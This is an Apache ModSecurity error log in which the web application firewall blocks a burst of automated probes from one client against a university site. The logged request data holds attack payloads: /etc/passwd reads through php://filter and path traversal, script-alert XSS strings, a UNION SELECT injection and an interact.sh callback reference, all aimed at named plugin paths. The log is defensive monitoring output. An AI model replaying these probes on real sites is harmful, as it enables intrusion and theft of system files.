[Tue Aug 29 11:53:17.787468 2023] [:error] [pid 2582] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh/ found within TX:1: interact.sh/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-content/plugins/brandfolder/callback.php"] [unique_id "ZO15vcCo-f0AAAoW7OkAAAAJ"]
[Tue Aug 29 11:53:18.915096 2023] [:error] [pid 2608] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfh.unla.ac.id"] [uri "/dompdf.php"] [unique_id "ZO15vsCo-f0AAAowNngAAAAH"]
[Tue Aug 29 11:53:19.572604 2023] [:error] [pid 2592] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:post. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:post: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-content/plugins/emag-marketplace-connector/templates/order/awb-meta-box.php"] [unique_id "ZO15v8Co-f0AAAog@EAAAAAY"]
[Tue Aug 29 11:53:19.843766 2023] [:error] [pid 2608] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS_NAMES:"/><script>alert(1)</script>. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS_NAMES:\\x22/><script>alert(1)</script>: \\x22/><script>alert(1)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15v8Co-f0AAAowNnoAAAAH"]
[Tue Aug 29 11:53:19.927102 2023] [:error] [pid 2609] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfh.unla.ac.id"] [uri "/PhpSpreadsheet/Writer/PDF/DomPDF.php"] [unique_id "ZO15v8Co-f0AAAox7FoAAAAN"]
[Tue Aug 29 11:53:20.643945 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfh.unla.ac.id"] [uri "/lib/dompdf/dompdf.php"] [unique_id "ZO15wMCo-f0AAAoz70cAAAAS"]
[Tue Aug 29 11:53:21.561684 2023] [:error] [pid 2605] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfh.unla.ac.id"] [uri "/includes/dompdf/dompdf.php"] [unique_id "ZO15wcCo-f0AAAot8O8AAAAn"]
[Tue Aug 29 11:53:23.318934 2023] [:error] [pid 2592] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:movie_param. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:movie_param: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-content/plugins/avchat-3/index_popup.php"] [unique_id "ZO15w8Co-f0AAAog@EsAAAAY"]
[Tue Aug 29 11:53:23.388118 2023] [:error] [pid 2602] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:controller: ../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15w8Co-f0AAAoqbR0AAAAj"]
[Tue Aug 29 11:53:23.675070 2023] [:error] [pid 2602] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-content/plugins/web-portal-lite-client-portal-secure-file-sharing-private-messaging/includes/libs/pdf/dompdf.php"] [unique_id "ZO15w8Co-f0AAAoqbR4AAAAj"]
[Tue Aug 29 11:53:23.834930 2023] [:error] [pid 2583] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-content/plugins/buddypress-component-stats/lib/dompdf/dompdf.php"] [unique_id "ZO15w8Co-f0AAAoXJwoAAAAP"]
[Tue Aug 29 11:53:24.759232 2023] [:error] [pid 2579] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-content/plugins/abstract-submission/dompdf-0.5.1/dompdf.php"] [unique_id "ZO15xMCo-f0AAAoT7XYAAAAD"]
[Tue Aug 29 11:53:24.784672 2023] [:error] [pid 2609] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:urls[<img src=x onerror=alert(document.domain)>]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: = found within ARGS_NAMES:urls[<img src=x onerror=alert(document.domain)>]: urls[<img src=x onerror=alert(document.domain)>]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO15xMCo-f0AAAox7GkAAAAN"]
[Tue Aug 29 11:53:25.860218 2023] [:error] [pid 2571] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-content/plugins/post-pdf-export/dompdf/dompdf.php"] [unique_id "ZO15xcCo-f0AAAoLfTMAAAAG"]
[Tue Aug 29 11:53:25.928402 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:query: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/search"] [unique_id "ZO15xcCo-f0AAAfWOXEAAAAL"]
[Tue Aug 29 11:53:27.558738 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-content/plugins/blogtopdf/dompdf/dompdf.php"] [unique_id "ZO15x8Co-f0AAAoz71oAAAAS"]
[Tue Aug 29 11:53:27.843034 2023] [:error] [pid 2602] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:file: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-content/plugins/wp-swimteam/include/user/download.php"] [unique_id "ZO15x8Co-f0AAAoqbSwAAAAj"]
[Tue Aug 29 11:53:28.044511 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-content/plugins/gboutique/library/dompdf/dompdf.php"] [unique_id "ZO15yMCo-f0AAAoz714AAAAS"]
[Tue Aug 29 11:53:28.055493 2023] [:error] [pid 2612] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:module. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:module: module\\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/mods/clansphere/lang_modvalidate.php"] [unique_id "ZO15yMCo-f0AAAo0gOIAAAAZ"]
[Tue Aug 29 11:53:28.907687 2023] [:error] [pid 2591] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-content/plugins/wp-ecommerce-shop-styling/includes/dompdf/dompdf.php"] [unique_id "ZO15yMCo-f0AAAofm8IAAAAX"]
[Tue Aug 29 11:53:28.943366 2023] [:error] [pid 2612] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:module. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:module: 'onm<a>ouseover=alert(document.domain)'\\x22tabindex=1"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/module/"] [unique_id "ZO15yMCo-f0AAAo0gOUAAAAZ"]
[Tue Aug 29 11:53:29.264521 2023] [:error] [pid 2603] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:command. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x95\\x5c\\x8e\\xa6 found within ARGS:command: \\x95\\x5c\\x8e\\xa6"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/Solar_History.php"] [unique_id "ZO15ycCo-f0AAAor7s0AAAAk"]
[Tue Aug 29 11:53:30.603480 2023] [:error] [pid 2591] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:searchinput. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe2\\x80\\x9c/>< found within ARGS:searchinput: \\xe2\\x80\\x9c/><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/search-locker-details.php"] [unique_id "ZO15ysCo-f0AAAofm8UAAAAX"]
[Tue Aug 29 11:53:31.237335 2023] [:error] [pid 2579] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15y8Co-f0AAAoT7ZAAAAAD"]
[Tue Aug 29 11:53:33.888112 2023] [:error] [pid 2608] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:layout_settings_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:layout_settings_id: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-content/plugins/page-layout-builder/includes/layout-settings.php"] [unique_id "ZO15zcCo-f0AAAowNqsAAAAH"]
[Tue Aug 29 11:53:35.305289 2023] [:error] [pid 2609] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:expertise. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:expertise: Heart' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,md5('999999999'),NULL,NULL,NULL,NULL,NULL,NULL-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/patient/search_result.php"] [unique_id "ZO15z8Co-f0AAAox7IUAAAAN"]
[Tue Aug 29 11:53:35.871419 2023] [:error] [pid 2566] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:layout. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:layout: /etc/resolv.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfh.unla.ac.id"] [uri "/"] [unique_id "ZO15z8Co-f0AAAoGFdMAAAAE"]
[Tue Aug 29 11:53:37.772799 2023] [:error] [pid 2575] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:yuzo_related_post_css_and_style. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:yuzo_related_post_css_and_style: </style><script>alert(0);</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-admin/options-general.php"] [unique_id "ZO150cCo-f0AAAoPucgAAAAM"]
[Tue Aug 29 11:53:38.631876 2023] [:error] [pid 2580] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS_NAMES:</script><script>alert(document.domain)</script>. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS_NAMES:</script><script>alert(document.domain)</script>: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/"] [unique_id "ZO150sCo-f0AAAoUJcwAAAAB"]
